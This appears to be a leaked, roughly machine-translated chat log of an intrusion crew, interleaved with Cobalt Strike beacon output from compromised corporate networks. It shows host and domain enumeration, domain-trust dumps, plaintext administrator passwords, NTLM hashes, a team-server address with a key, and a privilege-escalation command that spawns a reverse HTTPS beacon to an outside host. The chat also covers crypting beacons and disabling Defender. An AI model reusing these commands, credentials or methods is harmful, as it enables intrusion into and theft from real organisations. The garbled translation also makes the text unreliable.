172.31.190.101:445 (platform: 500 version: 5.0 name: NDHSNASC9103 domain: JDOSSN)
172.31.190.102:445 (platform: 500 version: 5.0 name: NDHSNASC9014 domain: JDOSSN)
172.31.190.103:445 (platform: 500 version: 5.0 name: NDHSNASTESTC001 domain: JDOSSN)
Scanner module is complete
``20 minPovislaThere are 10 in progress+do all groups have this address in their mail? I think so.
E-mail: briancarroll@directmail.com
``This isn't porn://www.bigassfans.com/повершелом by the user either```
    Name : Private Dashboard | Big Ass Fans
    URL : https://bigassfans.myabsorb.com/#/dashboard
``Real domain and I'm creating a confab, hell info I didn't ask for it. Why? @user9.local doesn't count @user3 the main domain is real and I'll create a chat room - Austin.SilencerShop.comWill you make groups that don't litter here? @tl1thinks it's real@user9 browser still check it outAre there any trusts @user9?
seems normal, few machines and users 133/68```
Host Name: MMURPHY
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.18362 N/A Build 18362
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: helpdesk
Registered Organization: N/A
Product ID: 00330-80136-38831-AA714
Original Install Date: 3/5/2020, 7:55:40 AM
System Boot Time: 10/15/2020, 3:13:39 PM
System Manufacturer: Microsoft Corporation
System Model: Surface Laptop 3
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 126 Stepping 5 GenuineIntel ~1198 Mhz
BIOS Version: Microsoft Corporation 7.124.140, 6/23/2020
Windows Directory: C:\windows
System Directory: C:{windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 7,782 MB
Available Physical Memory: 3,868 MB
Virtual Memory: Max Size: 8,998 MB
Virtual Memory: Available: 4,426 MB
Virtual Memory: In Use: 4,572 MB
Page File Location(s): C:\pagefile.sys
Domain: DMGROUP
Logon Server:              \CYMA17
Hotfix(s): 9 Hotfix(s) Installed.
                           [01]: KB4578974
                           [02]: KB4497727
                           [03]: KB4521863
                           [04]: KB4561600
                           [05]: KB4576751
                           [06]: KB4576754
                           [07]: KB4577670
                           [08]: KB4580325
                           [09]: KB4577671
Network Card(s): 4 NIC(s) Installed.
                           [01]: Intel(R) Wi-Fi 6 AX201 160MHz
                                 Connection Name: Wi-Fi
                                 Status: Media disconnected
                           [02]: Bluetooth Device (Personal Area Network)
                                 Connection Name: Bluetooth Network Connection
                                 Status: Media disconnected
                           [03]: TAP-Windows Adapter V9
                                 Connection Name: Local Area Connection
                                 Status: Media disconnected
                           [04]: DisplayLink Network Adapter NCM
                                 Connection Name: Ethernet 3
                                 DHCP Enabled: Yes
                                 DHCP Server: 172.16.4.69
                                 IP address(es)
                                 [01]: 172.16.4.42
                                 [02]: fe80::59eb:2e4:28b8:70ee
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
                           Virtualization Enabled In Firmware: Yes
                           Second Level Address Translation: Yes
                           Data Execution Prevention Available: Yes

``Trend Mycrots have one more free session available and check out the users[ ](https://mediaeveryone.com/channel/general?msg=kNNDhmN3z5kdL2Bj8) ``
Host Name: W08872612198
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.18362 N/A Build 18362
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: W08872612198
Registered Organization: N/A
Product ID: 00330-52406-72961-AAOEM
Original Install Date: 12/5/2019, 6:01:44 PM
System Boot Time: 9/23/2020, 12:22:08 AM
System Manufacturer: Dell Inc.
System Model: OptiPlex 5070
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~3000 Mhz
BIOS Version: Dell Inc. 1.2.1, 11/14/2019
Windows Directory: C:\Windows
System Directory: C:{Windows\system32
Boot Device:               \Device\HarddiskVolume3
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-06:00) Central Time (US & Canada)
Total Physical Memory: 16.166 MB
Available Physical Memory: 8.825 MB
Virtual Memory: Max Size: 18,598 MB
Virtual Memory: Available: 8,859 MB
Virtual Memory: In Use: 9,739 MB
Page File Location(s): C:\pagefile.sys
Domain: jdossn.local
Logon Server:              \JDODC12
Hotfix(s): 14 Hotfix(s) Installed.
                           [01]: KB4552931
                           [02]: KB4497165
                           [03]: KB4497727
                           [04]: KB4515383
                           [05]: KB4516115
                           [06]: KB4524569
                           [07]: KB4528759
                           [08]: KB4537759
                           [09]: KB4560959
                           [10]: KB4561600
                           [11]: KB4565554
                           [12]: KB4569073
                           [13]: KB4576751
                           [14]: KB4574727
Network Card(s): 2 NIC(s) Installed.
                           [01]: Intel(R) Ethernet Connection (7) I219-V
                                 Connection Name: Ethernet
                                 DHCP Enabled: Yes
                                 DHCP Server: 172.31.190.17
                                 IP address(es)
                                 [01]: 10.51.128.172
                                 [02]: fe80::896f:a415:af2d:57b1
                           [02]: Intel(R) Wireless-AC 9560 160MHz
                                 Connection Name: Wi-Fi
                                 Status: Media disconnected
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
                           Virtualization Enabled In Firmware: Yes
                           Second Level Address Translation: Yes
                           Data Execution Prevention Available: Yes

``What's the axis? Because without AV?
[+] Determining what EDR products are installed on localhost...
[+] No EDR products found! Operate at your own risk!
``````
beacon> psinject 13584 x86 Get-DomainUser -Server 10.50.212.45 | out-file -filepath "C:\ProgramData\ad_users.txt"
[*] Tasked beacon to psinject: Get-DomainUser -Server 10.50.212.45 | out-file -filepath "C:\ProgramData\ad_users.txt" into 13584 (x86)
[+] host called home, sent: 125019 bytes
[+] received output:
ERROR: FindAll : Exception calling "FindAll" with "0" argument(s): "The server is not operational.
ERROR: "
ERROR:
ERROR: At line:5253 char:52
ERROR: + else { $Results = $UserSearcher.FindAll <<<< () }
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : DotNetMethodException
ERROR:
``The ad_users in the mail address will be the real domain, if it will be .local then most likely something is wrong, check processes first, browser, ad infochet names are strange...``
txbaybcraig txbaybcware TXBayCGarza
txbaycharki txbaycphill txbaydblake
txbayecooke TXBayFBanks TXBayGHebel
TXBayGLane txbayjwille TXBayKSchoe
txbaymkurz txbaymobile txbayoffice
TXBayParts txbayparts2 txbayrmedin
TXBayRSeide txbayrvince txbayrzenke
txbaysdtv txbaytech1 txbaytech10
txbaytech11 txbaytech12 txbaytech2
txbaytech3 txbaytech4 txbaytech5
txbaytech6 txbaytech7 txbaytech8
txbaytech9 TXBayTechn txbaytechn2
txbaytlucas TXBayTStein txbaywhouse
TXBea4PBeau txbeaablanc txbeabblack
txbeacsory txbeacthibo TXBeaDBertino
txbeadblanc TXBeaDLivin txbeadrive1
txbeajborda txbeajbowen txbeajlariv
txbeajleach TXBeaKHoffm txbeaklee
``try to take off through the shell didn't create through run just displayed a list of name+group
through the shell did not work with the same error is it an external domain? try to run adfind.exe directly without ``button
beacon> run AdFind.bat
[*] Tasked beacon to run: AdFind.bat
[+] host called home, sent: 347720 bytes
[-] could not spawn AdFind.bat: 5
``within run?
beacon> shell AdFind.bat
[*] Tasked beacon to run: AdFind.bat
[+] host called home, sent: 41 bytes
[-] could not spawn C:\WINDOWS\system32\cmd.exe /C AdFind.bat: 5
beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[-] could not spawn C:\WINDOWS\system32\cmd.exe /C dir: 5
``Not localreal domains plz''
usr2-2[LP-BC8DTT2]BEngeron/15956|2020Oct15 22:33:49> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
WOSupply.local
``Look at the aduser and tell me if it happens or not, but it seems to be a real session
```
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 231 bytes
[+] received output:
BigAssFan.local
``or reality? is it a trickBigAssFan.local on the classic - get the session, write the domain here, create a confab and then as usual for nothing good, thank youmaximum you will look for profiles for the team server do not think tomorrow will throw the guide, it is as understandable tomorrow will be no questions questions? tomorrow you and I will deal with cob settings and stuff, with servers today will solve the problem plan following
```
104.194.11.160:41476
SISmByXnBD8YYmmWFNtumTJWsX8YQhO4O6VR
```
here come the sessions, separate the AV/Honey from the normal networks and work with them, the coba is clean, you can pass yourself from here or work in it, depends on the dirt your kobya already wrote about it so we were told to fuck up now, so less you fuck up later because you busy@user7 about the coba a little later this is familiar ?I'm not asking how you infect the victim, I'm asking how you crypt the cob and stuff like session distribution between the teams how do you prepare the cob ?well, here's how you get the sessions ? @tl2 and silence, thank you at least for such answers (ok, then how to configure ? setup - please if you do not know where to get servers I will not tell here@user8 already wrote himself think about it and ask us first we want an answer to this question, where and how can you tell us ? first thing: take servers where will? what, how and why do we know the order of getting sessions on the cob
1. how to prepare a cobu
2. what to do
3. how to do it correctly
4. the principles of work to explain everything we need to bring it to us this allcoba need an algorithm for obtaining a new coba for each day with new configs, gaskets, servers
clean after configurations? next after what? hmm. let's say, what next? or how to understand what I wrote? thank you all clear server registration, configuration of a web server with a domain and ssl which is sent to the server kobys hear hearPlease hear my cry from the soul !A to Z needs a complete scheme, not links to gita@tl1 @tl2 and about "spacers" in detail and the whole list of preparations setup cobo Explain in full the principle of getting cob@tl1 @tl2 Please take 10-15 minutes now, than to be distracted by our pings with stupid questions@tl1 @tl2
How to make sure the cobs arrive without pestering you with this? after 10 da@tl1 @tl2what about today's nets?:smirk: you will be the last one in any case) tell me if there are mistakes, otherwise it will not work and I will be the last one to blame!
https://helpdocpt.club/threads/windows-%D0%A4%D0%BE%D1%80%D1%81-%D1%83%D0%B4%D0%B0%D0%BB%D1%91%D0%BD%D0%BD%D0%BE%D0%B3%D0%BE-%D0%BE%D0%B1%D0%BD%D0%BE%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F-%D0%B3%D1%80%D1%83%D0%BF%D0%BF%D0%BE%D0%B2%D1%8B%D1%85-%D0%BF%D0%BE%D0%BB%D0%B8%D1%82%D0%B8%D0%BA.43/есть лингвисты? проверьте
https://helpdocpt.club/threads/%D0%9E%D1%82%D0%BA%D0%BB%D1%8E%D1%87%D0%B5%D0%BD%D0%B8%D0%B5-windows-defender-%D1%87%D0%B5%D1%80%D0%B5%D0%B7-%D0%B3%D1%80%D1%83%D0%BF%D0%BF%D0%BE%D0%B2%D1%8B%D0%B5-%D0%BF%D0%BE%D0%BB%D0%B8%D1%82%D0%B8%D0%BA%D0%B8.42/ну if they are finished it is unlikely there is anything else to do there also mother-in-law lpe exploits translate the guide to disable vin def for the forum nonstop check everything to have time to deal with the forum and additional modules neah (the old have not arrived? nah (no sessions?) HelloHelloGood afternoon
if there are sessions - wait so are we done? better get a "local" admin if you're inside your trust domain i haven't changed passwords?
beacon> make_token saig.frd.global\adm.soucam1 chs@1944!
[*] Tasked beacon to create a token for saig.frd.global\adm.soucam1
[+] host called home, sent: 55 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
beacon> shell tasklist /s 10.195.23.14 /v
[*] Tasked beacon to run: tasklist /s 10.195.23.14 /v
[+] host called home, sent: 58 bytes
[+] received output:
ERROR: Logon failure: unknown user name or bad password.


``1 out of 3 should hit)`` and you try the other 2
Password expires 11/10/2018 6:46:28 PM
``````

beacon> shell net use X: \\10.195.113.12\C$\temp /user:c360.local\adm.ravven0 Need2learn2008
[*] Tasked beacon to run: net use X: \\10.195.113.12\C$\temp /user:c360.local\adm.ravven0 Need2learn2008
[+] host called home, sent: 109 bytes
[+] received output:
System error 2242 has occurred.

The password of this user has expired.

``then look at the program files``
beacon> shell tasklist /s 10.195.13.14 /v /u c360.local\adm.ravven0 /p Need2learn2008
[*] Tasked beacon to run: tasklist /s 10.195.13.14 /v /u c360.local\adm.ravven0 /p Need2learn2008
[+] host called home, sent: 102 bytes
[+] received output:
ERROR: The RPC server is unavailable.


``Try directly specifying accesses without tokenvot 3 pcs``.
adm.ravven0:Need2learn2008
``````
adm.taydav1:G0d1sr3al!
``````
adm.turime0:Concentrada2
``````
1210 adm.kinzac1 52ab4557416b5fd8dfeed6e329db05fb 512
1199 adm.turime0 aa94145c9f2d8a1cea6b554049fe7c1d 512
1207 adm.matdmy0 43527144907fdc17ccf21dac8f24a39c 66048
1202 adm.kalnic0 d9c4c5a3dca64991399474767d6276b9f9 512
500 c360.datacentre 1cd6234cdaf74494d8689cd56317637c 66048
1205 adm.bisfra0 0e36ddd194d4b863966cf521fd6e683e 512
1216 adm.facjoe0 c58e6ce4e121d1c79ff799b42898121d 512
1118 adm.ravven0 ebc8defb32dea60e9ed2470e6810a76b 512
1218 adm.taydav1 03e9c6b99ff2bbdf6f8c39af19e1b7d0 512
I'll check 5 or 6 of them[ ](https://mediaeveryone.com/group/saiglobal-com?msg=CtE7inA3av5aGBwhy) and give me the hashes of the critical infrastructural servers required for domain authentication
but if there is also some balloon there, you can leave the markdomen controllers always necessarily remain in a separate groupclearcred no then another yes, with clearedcreds
>operatingSystem: Windows Server 2012 R2 Standard
>operatingSystemVersion: 6.3 (9600)
```
```
beacon> portscan 10.195.13.14 445,139 icmp 1024
[*] Tasked beacon to scan ports 445,139 on 10.195.13.14
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.195.13.14' is alive. [read 8 bytes]
10.195.13.14:139
10.195.13.14:445 (platform: 500 version: 6.3 name: AUHDC1-CSPSQL10 domain: C360)
Scanner module is complete
Try it with a direct kred indication? which os, domain will it detect? and portscan 139 445 on this pc
beacon> shell net user adm.ji0lei0 /dom
[*] Tasked beacon to run: net user adm.ji0lei0 /dom
[+] host called home, sent: 56 bytes
[+] received output:
User name adm.ji0lei0
Full Name Admin - Leida Ji
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 30/08/2018 6:46:28 PM
Password expires 11/10/2018 6:46:28 PM
Password changeable 31/08/2018 6:46:28 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users *Domain Admins
The command completed successfully.

``net user give it token yes from which the account is active? and what is the error?
c "c360.local" dir also does not give out with the token YES (account is active, credentials are valid)

```
beacon> shell dir \10.195.13.14\c$
[*] Tasked beacon to run: dir \\10.195.13.14\c$
[+] host called home, sent: 52 bytes
[+] received output:
Access is denied.
``I tried it on 3 different machines
beacon> shell tasklist /s 10.225.10.215 /v
[*] Tasked beacon to run: tasklist /s 10.225.10.215 /v
[+] host called home, sent: 59 bytes
What? RDS? Is there a CmRcService in Terminal Server? Does it have >memberOf: CN=Terminal Server License Servers,CN=Builtin,DC=datacenter,DC=local@tl1 if the PC has OU=Corporate IT
it is possible to put it into such a subgroup when sorting? services from AD, processes are taken down when nothing is clear from AD info list of processes, its group, description in AD, etc.
viewing the groups of policies for the sake of understanding the structure of the network - just a great idea and what method means exactly? and what kind of information is needed so special? ah, well, yes, I did a separate thread ... at least these went into quarantine ...
dn:CN=c360.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/08-09:25:57 AUS Eastern Daylight Time
>name: c360.local
>securityIdentifier: S-1-5-21-2457170381-1748207559-2678280483
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: c360.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
``We've had a change in communications, it was in the forum.``

dn:CN=80-20.com,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2008/04/03-15:34:59 AUS Eastern Daylight Time
>name: 80-20.com
>securityIdentifier: S-1-5-21-789336058-1343024091-1417001333
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: 80-20.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=legalco.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2010/06/02-15:05:33 AUS Eastern Daylight Time
>name: legalco.local
>securityIdentifier: S-1-5-21-1275210071-2025429265-1417001333
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: legalco.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 68 [Quarantined-Domain(4);Treat-External(64)]

dn:CN=frd.global,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2006/03/20-15:18:22 AUS Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=Anstat.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2007/07/03-13:18:37 AUS Eastern Daylight Time
>name: Anstat.local
>securityIdentifier: S-1-5-21-295181386-3567791559-1353306441
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: Anstat.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=leaders.frd.global,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2011/01/18-14:59:38 AUS Eastern Daylight Time
>name: leaders.frd.global
>securityIdentifier: S-1-5-21-888074932-249386324-1990136273
>trustDirection: 1 [Inbound(1)
>trustPartner: leaders.frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=standards.com.au,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2006/04/18-13:02:07 AUS Eastern Daylight Time
>name: standards.com.au
>securityIdentifier: S-1-5-21-8915387-1104766828-763373030
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: standards.com.au
>trustType: 2 [UpLevel(2)
>trustAttributes: 0 []

dn:CN=saig.frd.global,CN=System,DC=frd,DC=global
>whenCreated: 2006/03/20-15:18:22 AUS Eastern Daylight Time
>name: saig.frd.global
>securityIdentifier: S-1-5-21-2959458370-3657645319-1944215935
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: saig.frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=ad-apse2.np.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2017/05/19-14:26:44 AUS Eastern Daylight Time
>name: ad-apse2.np.aws.saig
>securityIdentifier: S-1-5-21-199586283-846828525-2273482586
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ad-apse2.np.aws.saig
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=ad-usea1.np.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2017/07/11-17:21:06 AUS Eastern Daylight Time
>name: ad-usea1.np.aws.saig
>securityIdentifier: S-1-5-21-3403532533-1899797052-316633242
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ad-usea1.np.aws.saig
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=ad-apse2.build.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2017/07/12-11:16:33 AUS Eastern Daylight Time
>name: ad-apse2.build.aws.saig
>securityIdentifier: S-1-5-21-2542211190-1088484194-4279143674
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ad-apse2.build.aws.saig
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=ad-euce1.prd.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2017/11/08-13:27:58 AUS Eastern Daylight Time
>name: ad-euce1.prd.aws.saig
>securityIdentifier: S-1-5-21-3050823117-3304142573-3876120398
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ad-euce1.prd.aws.saig
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=ad-usea1.prd.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2018/01/15-20:16:54 AUS Eastern Daylight Time
>name: ad-usea1.prd.aws.saig
>securityIdentifier: S-1-5-21-2974031555-4010838971-2461281460
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ad-usea1.prd.aws.saig
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=datacenter.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/14-00:59:37 AUS Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=c360uk.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/17-20:20:15 AUS Eastern Daylight Time
>name: c360uk.local
>securityIdentifier: S-1-5-21-2060452117-3986949954-748576278
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: c360uk.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=SaigProd.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/07-15:56:50 AUS Eastern Daylight Time
>name: SaigProd.local
>securityIdentifier: S-1-5-21-3702894564-3969952199-2128771015
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: SaigProd.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=c360.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/08-09:25:57 AUS Eastern Daylight Time
>name: c360.local
>securityIdentifier: S-1-5-21-2457170381-1748207559-2678280483
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: c360.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=c360uk.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/07/23-20:59:31 AUS Eastern Daylight Time
>name: c360uk.local
>securityIdentifier: S-1-5-21-2060452117-3986949954-748576278
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: c360uk.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=ad-apse2.prd.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2019/07/24-18:10:06 AUS Eastern Daylight Time
>name: ad-apse2.prd.aws.saig
>securityIdentifier: S-1-5-21-3745473896-2843996748-977219772
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ad-apse2.prd.aws.saig
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]


19 Objects returned

Well, now that you mention processcolour
here you go
https://github.com/icebearfriend/Quickrundownувы, it's wildly tedious pdf, but sometimes if you shine on it a bit - informative) if it processcolor.cna skidykaGood for you, it's more about trusts and attributes and stuffxD hope that something else can shoot hell...Lolno we did not throw it specially you can take in one command all the trusts in the domain now I will throw you a cool thing
which I should have given long ago ... but okay at least did samosamokriticheskoe xDda I'm a stupid animal what can I say here was with *[ ](https://mediaeveryone.com/group/saiglobal-com?msg=RhSbHC2uoMM5zoivr) 100% was a session under the admin and you tried to bypass the yuak yes?
user 2-2[AUHDC1-SPPDC01]SYSTEM */4576|2020Oct06 01:15:50> net domain_trusts
[*] Tasked beacon to run net domain_trusts
[+] host called home, sent: 104513 bytes
[+] received output:
List of domain trusts:

    0: SAIG saig.frd.global (Direct Outbound) (Direct Inbound)
    1: SAIGPROD saigProd.local (Forest tree root) (Primary Domain) (Native)
``````
>trustAttributes: 32 [Within-Forest(32)]
```
In a forest, respectively, it can be a trustA transitive trust is a trust that is extended not only to a child object, but also to each object that the child trusts. (In contrast, a non-transitive trust extends only to one object.) there's a session under local polzak or somethinga it's ok so are you an admin? I can't get a system on datacenter.local, it's win serv 2016
```
beacon> elevate svc-exe
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) via Service Control Manager (\127.0.0.1\ADMIN$\b59b87e.exe)
[+] host called home, sent: 291370 bytes
[-] Could not start service b59b87e on .: 225
```
what to do?
beacon> shell ping -n 1 frd.global
[*] Tasked beacon to run: ping -n 1 frd.global
[+] host called home, sent: 51 bytes
[+] received output:

Pinging frd.global [10.225.12.1] with 32 bytes of data:
Reply from 10.225.12.1: bytes=32 time<1ms TTL=128

Ping statistics for 10.225.12.1:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

``````
beacon> shell ping frd.global
[*] Tasked beacon to run: ping frd.global
[+] host called home, sent: 46 bytes
[+] received output:

Pinging frd.global [10.195.25.98] with 32 bytes of data:
Reply from 10.195.25.98: bytes=32 time=206ms TTL=123
Reply from 10.195.25.98: bytes=32 time=206ms TTL=123
Reply from 10.195.25.98: bytes=32 time=206ms TTL=123
Reply from 10.195.25.98: bytes=32 time=206ms TTL=123

Ping statistics for 10.195.25.98:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 206ms, Maximum = 206ms, Average = 206ms

``@tl2 tell me please the difference between transitive and forrest?`` This is from the current
dn:CN=frd.global,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2006/03/20-00:18:22 Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]
```о
transitive
+sees it?"``
dn:CN=frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/04/14-00:59:25 AUS Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
````datacenter.local`
```
dn:CN=saig.frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time
>name: saig.frd.global
>securityIdentifier: S-1-5-21-2959458370-3657645319-1944215935
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: saig.frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/04/14-00:59:25 AUS Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
``the rest of us? >`Yeah, there's only a reverse trustc360.local
```
Using server: AUHDC1-C360-DC1.c360.local:3268
Directory: Windows Server 2012 R2

dn:CN=saig.frd.global,CN=System,DC=c360,DC=local
>whenCreated: 2018/06/08-09:22:10 AUS Eastern Daylight Time
>name: saig.frd.global
>securityIdentifier: S-1-5-21-2959458370-3657645319-1944215935
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: saig.frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]


1 Objects returned
Are there any more trusts available in this domain among your trusts? Yes, except for one of them, did you take the trusts off in the "taken" domains?
dn:CN=SaigProd.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/07-00:56:50 Eastern Daylight Time
>name: SaigProd.local
>securityIdentifier: S-1-5-21-3702894564-3969952199-2128771015
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: SaigProd.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]
``and I asked you not to touch quarantines at least it's in quarantine''.
dn:CN=c360uk.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/07/23-05:59:31 Eastern Daylight Time
>name: c360uk.local
>securityIdentifier: S-1-5-21-2060452117-3986949954-748576278
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: c360uk.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
``top)= )waaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
beacon> shell dir \\10.225.10.201\c$
[*] Tasked beacon to run: dir \\10.225.10.201\c$
[+] host called home, sent: 53 bytes
[+] received output:
 Volume in drive \10.225.10.201\c$ has no label.
 Volume Serial Number is 2AC9-2F68

 Directory of \10.225.10.201$

14/03/2019 04:03 AM <DIR> PerfLogs
29/08/2020 03:26 AM <DIR> Program Files
14/03/2019 04:14 AM <DIR> Program Files (x86)
29/08/2020 03:26 AM <DIR> Temp
29/08/2020 02:52 AM <DIR> Users
06/10/2020 08:42 AM <DIR> Windows
               0 File(s) 0 bytes
               6 Dir(s) 49,648,717,824 bytes free

``You tested with ipac smb_login, try it with the IP address```
beacon> shell dir \\\datacenter.local\c$
[*] Tasked beacon to run: dir \\datacenter.local\c$
[+] host called home, sent: 56 bytes
[+] received output:
The system cannot find the file specified.

